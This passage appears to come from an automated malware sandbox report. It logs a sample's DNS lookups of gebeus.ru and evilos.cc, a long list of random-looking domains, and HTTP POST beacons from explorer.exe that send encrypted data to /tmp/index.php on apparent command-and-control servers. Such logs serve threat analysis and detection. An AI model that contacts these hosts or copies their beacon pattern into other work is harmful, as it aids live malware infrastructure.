                                              Jul 23, 2024 06:18:57.441834927 CEST4976780192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:57.447817087 CEST8049767211.202.224.10192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 23, 2024 06:15:24.178445101 CEST5035053192.168.2.51.1.1.1
                                              Jul 23, 2024 06:15:25.197494984 CEST5035053192.168.2.51.1.1.1
                                              Jul 23, 2024 06:15:25.298455000 CEST53503501.1.1.1192.168.2.5
                                              Jul 23, 2024 06:15:25.298523903 CEST53503501.1.1.1192.168.2.5
                                              Jul 23, 2024 06:15:27.318972111 CEST6014853192.168.2.51.1.1.1
                                              Jul 23, 2024 06:15:28.331592083 CEST6014853192.168.2.51.1.1.1
                                              Jul 23, 2024 06:15:29.347157001 CEST6014853192.168.2.51.1.1.1
                                              Jul 23, 2024 06:15:31.198801994 CEST53601481.1.1.1192.168.2.5
                                              Jul 23, 2024 06:15:31.198846102 CEST53601481.1.1.1192.168.2.5
                                              Jul 23, 2024 06:15:31.198875904 CEST53601481.1.1.1192.168.2.5
                                              Jul 23, 2024 06:16:24.212255001 CEST5913953192.168.2.51.1.1.1
                                              Jul 23, 2024 06:16:24.382796049 CEST53591391.1.1.1192.168.2.5
                                              Jul 23, 2024 06:18:02.852278948 CEST4994953192.168.2.51.1.1.1
                                              Jul 23, 2024 06:18:03.853648901 CEST4994953192.168.2.51.1.1.1
                                              Jul 23, 2024 06:18:04.843046904 CEST53499491.1.1.1192.168.2.5
                                              Jul 23, 2024 06:18:04.843102932 CEST53499491.1.1.1192.168.2.5
                                              Jul 23, 2024 06:18:04.847419977 CEST4994953192.168.2.51.1.1.1
                                              Jul 23, 2024 06:18:04.854345083 CEST53499491.1.1.1192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 23, 2024 06:15:24.178445101 CEST192.168.2.51.1.1.10x9920Standard query (0)evilos.ccA (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:25.197494984 CEST192.168.2.51.1.1.10x9920Standard query (0)evilos.ccA (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:27.318972111 CEST192.168.2.51.1.1.10x476cStandard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:28.331592083 CEST192.168.2.51.1.1.10x476cStandard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:29.347157001 CEST192.168.2.51.1.1.10x476cStandard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:16:24.212255001 CEST192.168.2.51.1.1.10x9c92Standard query (0)mussangroup.comA (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:02.852278948 CEST192.168.2.51.1.1.10x3c49Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:03.853648901 CEST192.168.2.51.1.1.10x3c49Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.847419977 CEST192.168.2.51.1.1.10x3c49Standard query (0)gebeus.ruA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 23, 2024 06:15:25.298455000 CEST1.1.1.1192.168.2.50x9920No error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:25.298523903 CEST1.1.1.1192.168.2.50x9920No error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru211.202.224.10A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru217.219.131.81A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru109.121.204.14A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru186.233.231.45A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru190.98.23.157A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru190.220.21.28A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198801994 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru175.119.10.231A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru211.202.224.10A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru217.219.131.81A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru109.121.204.14A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru186.233.231.45A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru190.98.23.157A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru190.220.21.28A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198846102 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru175.119.10.231A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru211.202.224.10A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru217.219.131.81A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru109.121.204.14A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru186.233.231.45A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru190.98.23.157A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru190.220.21.28A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:15:31.198875904 CEST1.1.1.1192.168.2.50x476cNo error (0)gebeus.ru175.119.10.231A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:16:24.382796049 CEST1.1.1.1192.168.2.50x9c92No error (0)mussangroup.com185.149.100.242A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru211.202.224.10A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru217.219.131.81A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru109.121.204.14A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru186.233.231.45A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru190.98.23.157A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru190.220.21.28A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru175.119.10.231A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843046904 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru211.202.224.10A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru217.219.131.81A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru109.121.204.14A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru186.233.231.45A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru190.98.23.157A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru190.220.21.28A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru175.119.10.231A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.843102932 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru211.202.224.10A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru109.121.204.14A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru186.233.231.45A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru190.98.23.157A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru190.220.21.28A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru175.119.10.231A (IP address)IN (0x0001)false
                                              Jul 23, 2024 06:18:04.854345083 CEST1.1.1.1192.168.2.50x3c49No error (0)gebeus.ru217.219.131.81A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • mussangroup.com
                                              • 167.235.128.153
                                              • 107.173.160.137
                                              • 107.173.160.139
                                              • psrjxmmdjkgukbst.net
                                                • gebeus.ru
                                              • nwahwjhjnhccg.org
                                              • xnykmijsuyh.org
                                              • orusljfrmtwk.net
                                              • gpbmggcpxwmve.org
                                              • rgmwogluhxcw.net
                                              • bnbjwqelfrqfgfg.org
                                              • ljcfhqrurbdrtnbx.net
                                              • 77.221.157.163
                                              • gxlpbwlusmnje.org
                                              • ujiloutaffhspsf.org
                                              • yfbmduchuitdam.org
                                              • jrnqiqvfjjkw.com
                                              • vlrfckdhdpbbw.org
                                              • qdkcshccmtjsaxfy.com
                                              • 64.190.113.113
                                              • mpvhivgiojy.com
                                              • qkeywmaxpqyajg.net
                                              • kyaejpplhrtmlm.com
                                              • ochmmwawdfhift.net
                                              • bmrqxjpnnmfq.org
                                              • vfkimedsiioubu.com
                                              • gsqdyhadbujwtt.org
                                              • gaccdlqnuttqyggb.com
                                              • hwyiclkccgwel.com
                                              • ayjiiqvsdwkm.org
                                              • sisxkrjxvfhbylwf.net
                                              • ejjtkyjcscj.net
                                              • rkihnepnpjlak.org
                                              • yakfbjcglwus.com
                                              • ahnkvlymtyox.com
                                              • scclxbagqps.com
                                              • ftpgvbtjlgwf.com
                                              • thvbfefxpihwuvsy.net

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.54971058.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:15:31.205391884 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://psrjxmmdjkgukbst.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 184
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:31.205391884 CEST184OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 5a ed af
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vuJZPGHwXJ!vqmP8s{\WH:?!@"d,>c`OW&A5'
                                              Jul 23, 2024 06:15:32.761040926 CEST152INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:32 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 04 00 00 00 72 e8 85 ea
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.54971158.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:15:32.775747061 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://nwahwjhjnhccg.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 291
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:32.775774956 CEST291OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 66 0d a1 fa
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vuf7GEuR0e>xS;rM]zMDEU}>v7hV%%W@|W/(^S%9GO%+a3|qg8%0
                                              Jul 23, 2024 06:15:34.276123047 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:33 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.54971258.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:15:34.286669016 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://xnykmijsuyh.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 201
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:34.286686897 CEST201OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 3d 54 de 81
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu=T\4wNu S#g,fmSa,bT;1%NP*B!!];WBzD^^
                                              Jul 23, 2024 06:15:35.836056948 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:35 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.54971358.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:15:35.871789932 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://orusljfrmtwk.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 115
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:35.871817112 CEST115OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 4a 56 fd 93
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vuJVJO]GPSx?l/
                                              Jul 23, 2024 06:15:37.370142937 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:37 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.54971458.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:15:37.378664017 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://gpbmggcpxwmve.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 164
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:37.378684044 CEST164OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 3b 25 a5 91
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu;%SCd''<G5.;/vg&zT@A]u<]/E
                                              Jul 23, 2024 06:15:38.858997107 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:38 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.54971558.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
